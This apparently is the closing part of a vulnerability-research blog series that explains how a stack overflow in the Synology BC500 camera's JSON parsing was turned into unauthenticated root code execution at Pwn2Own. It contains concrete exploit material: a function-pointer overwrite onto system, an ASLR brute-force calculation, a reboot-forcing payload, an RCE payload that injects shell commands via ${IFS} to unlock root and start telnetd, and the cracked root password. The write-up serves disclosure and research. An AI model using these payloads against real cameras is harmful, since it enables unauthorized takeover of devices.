If you have not read the previous blog posts, I recommend having a look at part 1, where we discuss how to extract the firmware from the camera; part 2, where we enumerate the attack surface; part 3, where we discuss how we discovered the vulnerability; and part 4, where we analyze the memory corruption.

In this final part of the series, we explain how the stack-based buffer overflow vulnerability can be exploited to gain unauthenticated remote code execution (RCE) on the Synology BC500 camera.

PC Control

Recall from part 4 that overflowing the stack with a ROP payload is tedious, as the library only accepts UTF-8 characters and rejects null bytes. We therefore looked for other ways to gain control over the program counter (PC), starting with interesting data structures on the stack that we could overflow.

After some reverse engineering, we noticed an interesting struct on the stack: lex_t. The definition of this struct can be found in the source code of the jansson library:

As the name suggests, lex_t is used by the lexer for tokenizing the JSON input. The following observations are important for the exploit:

  • The first field in the struct lex_t is of type struct stream_t.
  • The first field in the struct stream_t is a function pointer.
  • As described in the comment on line 49, this function pointer is used to fetch the next character from the user input.

When overflowing the stack, the function pointer is the first field in the struct that is overwritten. Therefore, we can overwrite the function pointer while leaving the rest of the struct intact. The remainder of this section shows where and how the function pointer is invoked by libjansson.
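The layout argument can be checked with a small model. The following Python sketch mirrors an abridged version of the two structs with ctypes. The field names and their order are an assumption based on the upstream jansson source, later members are omitted, and the vendor's build of the library may differ. Sizes on the host will not match the camera's 32-bit target, but the offset of a struct's first member is zero on any platform.

```python
import ctypes

# Models `int (*get)(void *data)`: the callback that returns the next input byte.
GetFunc = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p)


class StreamT(ctypes.Structure):
    # Abridged model of stream_t (assumed upstream field order).
    _fields_ = [
        ("get", GetFunc),           # function pointer, first member
        ("data", ctypes.c_void_p),  # argument that is handed to get()
        ("buffer", ctypes.c_char * 5),
        ("buffer_pos", ctypes.c_size_t),
        ("state", ctypes.c_int),
    ]


class LexT(ctypes.Structure):
    # Abridged model of lex_t; members after `stream` are omitted.
    _fields_ = [
        ("stream", StreamT),
    ]


def offset_of_get_in_lex() -> int:
    """Offset of the function pointer relative to the start of lex_t."""
    return LexT.stream.offset + StreamT.get.offset


if __name__ == "__main__":
    print(offset_of_get_in_lex())  # 0: the pointer sits at the very start of lex_t
```

Because the pointer sits at offset zero, an overflow that reaches lex_t hits the pointer before any other member of the struct.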

After overflowing the stack on line 34 (see part 4), the function lex_scan (line 41) is invoked:

Note that the first argument lex is a pointer to the lex_t struct. The function lex_scan invokes ZNSt3mapItPN3com4sony7imaging6remote24SDIDevicePropInfoDatasetESt4lessItESaISt4pairIKtS5_EEE4findERS9_:

This function (at address 0x0000581C) invokes sub_5418 (at address 0x00005418):

In sub_5418, after checking if the error flag is set, the function pointer is finally invoked with the first argument pointing to our input:

(Note: The field input in the decompiled code is actually called data in the source code.)

The details of the function pointer invocation can be seen more clearly in the disassembly:

The idea of the exploit is now to overwrite the function pointer with the address of libc’s system function. When the function pointer is invoked, system is called with our attacker-controlled input as its argument, allowing us to execute arbitrary commands on the system. The remaining issue is that the address of system is not static, as the system is configured with ASLR. This is addressed in the next section.

It is worth emphasizing that the actual exploit does not invoke libc’s system function but rather a sub-function of system that we shall refer to as system_impl. The function works exactly like system, except that a NULL check is omitted:
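The effect of swapping the pointer can be illustrated with a toy model. The Python sketch below is not the library's code: Stream, stream_get, read_first_byte and fake_system are hypothetical stand-ins, and fake_system only records its argument instead of running anything.

```python
from dataclasses import dataclass
from typing import Callable

STREAM_STATE_OK = 0  # assumed "no error" value for the state flag


@dataclass
class Stream:
    get: Callable[[bytes], int]  # models the function pointer
    data: bytes                  # models the pointer to the attacker input
    state: int = STREAM_STATE_OK


def stream_get(stream: Stream) -> int:
    """Toy dispatch: check the error state, then call get(data)."""
    if stream.state != STREAM_STATE_OK:
        return stream.state
    return stream.get(stream.data)


def read_first_byte(data: bytes) -> int:
    """Stand-in for the legitimate callback that fetches a character."""
    return data[0] if data else -1


executed = []


def fake_system(command: bytes) -> int:
    """Stand-in for system(): records the command instead of running it."""
    executed.append(command)
    return 0


stream = Stream(get=read_first_byte, data=b"attacker;controlled;input")
stream.get = fake_system  # the overflow replaces only the function pointer
stream_get(stream)        # the dispatch now hands the input to fake_system
```

The caller is unchanged; only the target of the pointer differs, which is why the rest of the struct can stay intact.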

The rationale behind this technicality is provided in the next section.

ASLR Bypass

Recall that 8-bit ASLR is configured on the camera’s operating system. For instance, in the address 0xABCDEFGH, the two hex digits D and E are chosen uniformly at random for each invocation of synocam_param.cgi. Each request is handled in a new process, so every fork gets a fresh ASLR offset that is independent of previous forks. This allows us to pick D and E freely for the address that points to system_impl, since any fixed choice will eventually be sampled. This is important because the address must be encodable in Unicode without any null bytes.

The system_impl function in libc was determined to be mapped to 0x768XYb34 where X and Y are chosen uniformly at random. In our payload, the address was fixed as 0x7683db34, which can be encoded in Unicode as \u0034\u06c3v (little-endian byte order). The probability that this address works at least once after n tries is given by 1-(1-p)^n where p=1/256. This gives a 98% success probability after sending 1000 requests to the camera, and a >99% success probability after roughly 1200 requests.
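Both the encoding and the success estimate can be reproduced with a few lines of Python. The sketch below is for illustration only and is not taken from the exploit; all helper names are hypothetical. It packs an address in little-endian order, decodes the bytes as UTF-8, lists which addresses of the form 0x768XYb34 survive that check, and evaluates the formula above.

```python
import math
import struct


def encode_address(addr: int) -> str:
    """Pack a 32-bit address little-endian and decode the bytes as UTF-8.

    Raises UnicodeDecodeError if the bytes are not valid UTF-8 and
    ValueError if they contain a null byte.
    """
    raw = struct.pack("<I", addr)
    if b"\x00" in raw:
        raise ValueError("address contains a null byte")
    return raw.decode("utf-8")


def encodable_candidates(base: int = 0x76800B34) -> list:
    """All addresses 0x768XYb34 whose little-endian bytes are valid UTF-8."""
    usable = []
    for xy in range(256):
        addr = base | (xy << 12)  # X and Y occupy bits 12..19
        try:
            encode_address(addr)
        except (UnicodeDecodeError, ValueError):
            continue
        usable.append(addr)
    return usable


def success_probability(n: int, p: float = 1 / 256) -> float:
    """Probability of at least one hit in n independent tries."""
    return 1 - (1 - p) ** n


def requests_needed(target: float, p: float = 1 / 256) -> int:
    """Smallest n for which success_probability(n, p) reaches target."""
    return math.ceil(math.log(1 - target) / math.log(1 - p))


if __name__ == "__main__":
    # "\u0034" is the character "4", so this matches \u0034\u06c3v.
    print(encode_address(0x7683DB34) == "\u0034\u06c3v")
    print(len(encodable_candidates()))
    print(round(success_probability(1000), 3), requests_needed(0.99))
```

Under this check only the candidates with Y equal to c or d pass, because the byte 0xYb has to be the lead byte of a two-byte UTF-8 sequence. That leaves 32 of the 256 possible addresses to choose from, and 0x7683db34 is one of them.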

The Pwn2Own rules state that an attack must complete within 10 minutes, and the participants are given three attempts. It was empirically determined that our attack is successful with a probability above 99%. However, there is one complication that can occur when the provided address of system_impl is not correct. In most instances, the synocam_param.cgi process simply crashes, which is not an issue as the webd daemon that forked the process is not affected (i.e., neither the web server nor the camera reboots). However, there are rare cases where the jump to an invalid or unexpected address causes the process to hang (e.g., it is waiting for input or spinning in an infinite loop). If too many processes hang, the camera can process fewer requests, which significantly slows down the exploit. While testing the exploit, we encountered cases where the attack did not complete or only barely completed within 10 minutes, which was an unacceptable risk.

To prevent this, the final exploit uses the following strategy: if the exploit detects a sufficiently high number of hanging processes, it sends a specific payload that forces a camera reboot. After the camera has rebooted, the exploit automatically resumes the attack. With this approach, the exploit completed within 10 minutes in all our trial runs (often it takes just a couple of seconds). The payload that causes a forced camera reboot is described in the section below.
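The control flow of this strategy can be sketched as a simple loop. The Python below is an assumption-laden outline rather than the real exploit: the four callables are hypothetical hooks supplied by the caller, and the threshold max_hung and the budget max_requests are made-up defaults, since the text does not state how hangs are detected or counted.

```python
def run_attack(send_rce, shell_is_up, count_hung, force_reboot,
               max_hung=5, max_requests=5000):
    """Repeat the RCE request until a shell appears.

    send_rce()     -- hypothetical hook: sends one RCE request
    shell_is_up()  -- hypothetical hook: True once the shell is reachable
    count_hung()   -- hypothetical hook: number of requests that appear hung
    force_reboot() -- hypothetical hook: triggers a reboot and blocks until
                      the camera is reachable again

    Returns the number of RCE requests sent, or None if the budget ran out.
    """
    for sent in range(1, max_requests + 1):
        send_rce()
        if shell_is_up():
            return sent
        if count_hung() >= max_hung:
            # Too many stuck workers slow everything down: start over.
            force_reboot()
    return None
```

Passing the hooks in as parameters keeps the loop testable without a camera, for example by supplying a shell_is_up stub that reports success on the third request.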

Payloads

Recall that the buffer overflow can be triggered by invoking an (unauthenticated) JSON endpoint of the camera’s web interface. This section describes the two payloads that were used in the exploit (camera reboot and RCE payload).

Camera Reboot Payload

It was found that when sending a JSON object with a key of length exactly 185 characters, the process that handles the request hangs:

{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "burp_is_not_b33f"}

The webd daemon has a pool of 10 threads for processing requests. If all of them hang, this is detected by a watchdog process, which then kills the webd daemon and reboots the camera. Therefore, a camera reboot can be forced by sending 10 requests containing the payload above.
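A minimal sketch of this step in Python is shown below. The body is built exactly as in the payload above; how a request is delivered is left to a caller-supplied send callable, which is hypothetical, as the endpoint and transport details are not repeated here.

```python
from concurrent.futures import ThreadPoolExecutor

POOL_SIZE = 10      # worker threads in webd, per the text
HANG_KEY_LEN = 185  # key length that makes the handler hang, per the text


def hang_body(key_len: int = HANG_KEY_LEN) -> str:
    """Build the request body with a key of exactly key_len 'A' characters."""
    return '{"' + "A" * key_len + '", "burp_is_not_b33f"}'


def force_reboot(send, workers: int = POOL_SIZE) -> None:
    """Send one hanging request per webd worker thread, all in parallel.

    `send` is a hypothetical callable that delivers one body to the
    vulnerable endpoint and handles its own timeout, since a hanging
    request is the expected outcome.
    """
    body = hang_body()
    with ThreadPoolExecutor(max_workers=workers) as pool:
        list(pool.map(send, [body] * workers))
```

The requests are sent in parallel so that all worker threads are occupied at the same time, which is the condition the watchdog reacts to.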

RCE Payload

The RCE payload is sent as a JSON key. The payload contains two bash commands that will be executed when the payload is triggered, as well as the address of system_impl (in Unicode format):

{"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaafaabgaabhaabiaabjaabkaablaa;passwd${IFS}-u${IFS}root;telnetd;CCCC\u0034\u06c3v";"")

Note that including spaces in the payload leads to some complications; the most straightforward solution was to replace spaces with the ${IFS} bash variable.
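The structure of the key can be summarized in a short Python sketch. The helper names are hypothetical; the padding, the CCCC filler and the encoded address are simply taken as inputs, since their exact lengths depend on the stack layout described in part 4.

```python
def join_commands(commands) -> str:
    """Chain shell commands with ';' and replace spaces with ${IFS}."""
    return ";".join(cmd.replace(" ", "${IFS}") for cmd in commands)


def build_key(padding: str, commands, filler: str, address: str) -> str:
    """Assemble: padding ; commands ; filler followed by the encoded address."""
    return f"{padding};{join_commands(commands)};{filler}{address}"


if __name__ == "__main__":
    key = build_key(
        padding="<padding>",              # placeholder for the cyclic pattern
        commands=["passwd -u root", "telnetd"],
        filler="CCCC",
        address="\u0034\u06c3v",          # 0x7683db34, little-endian, as UTF-8
    )
    print(key)
```

Presumably the semicolons matter because the whole key is handed to the shell: the padding before the first semicolon and the filler after the last one are just commands that fail, while the two commands in between run normally.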

To ensure that the function pointer is invoked on our input, the stack needs to be aligned correctly. It turns out that HTTP headers are passed to the synocam_param.cgi binary through environment variables that are stored on the stack. Therefore, the stack can be aligned by adding custom headers:

Dummy: ayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab
Content-Type: application/json

The first header ensures that the stack is aligned correctly, while the second one sets the content type.

If the ASLR offset is correct, the payload above executes two commands (as root):

  • Enable the root user.
  • Start a telnet daemon, which then allows logging in as the root user.

Once the payload has successfully executed, the attacker can log in via telnet with root / 12345. (By default, the root user is locked but a password is pre-configured. This password (12345) was cracked with an offline brute-force attack against the password hash stored in /etc/passwd.)

The following image shows the shell access after the payload has successfully executed:

Pwn2Own Competition

Finally, on October 23rd it was time for two of our teammates to fly out to Toronto to demonstrate the exploit against the BC500 camera in the ZDI office.

In Pwn2Own, the first team to successfully demonstrate the exploit will receive the full payout, while subsequent teams targeting the same device with the same bug will receive a reduced amount. The draw to determine the schedule happened during the flight, which we could follow thanks to inflight Wi-Fi. Unfortunately for us, we would be the 3rd team to demonstrate our exploit against the Synology BC500 camera.

Additionally, while our two teammates were in the air, the teammates back home discovered that Synology had just released a small firmware update. As we could not analyze the update on the airplane, the fear that the bug chain could have been patched started to grow. Luckily, after a long few minutes, the teammates at home confirmed that the exploit still worked against the latest firmware.

Note: While the release notes only mention “Minor bug fixes.”, the updated firmware version actually patched multiple vulnerabilities, including the authenticated command injections we described in part 2 of this blog series.

The next day it was time to demonstrate the exploit. Up to three attempts within a 30-minute time window were allowed. We were confident that the exploit would succeed, but as an ASLR brute-force was required we were still a little nervous. Fortunately, the exploit succeeded after only a few seconds! The first successful attempt at Pwn2Own from Compass Security was confirmed.

Afterwards it was time to discuss the bug and exploit with the ZDI team. The same bug had unfortunately already been used by another team before us, so our payout was reduced from $30,000 to $3,750.

Nevertheless, it was an amazing (albeit sometimes frustrating) journey with many lessons learned! We hope to be back at Pwn2Own in 2024.

All the parts of this blog post: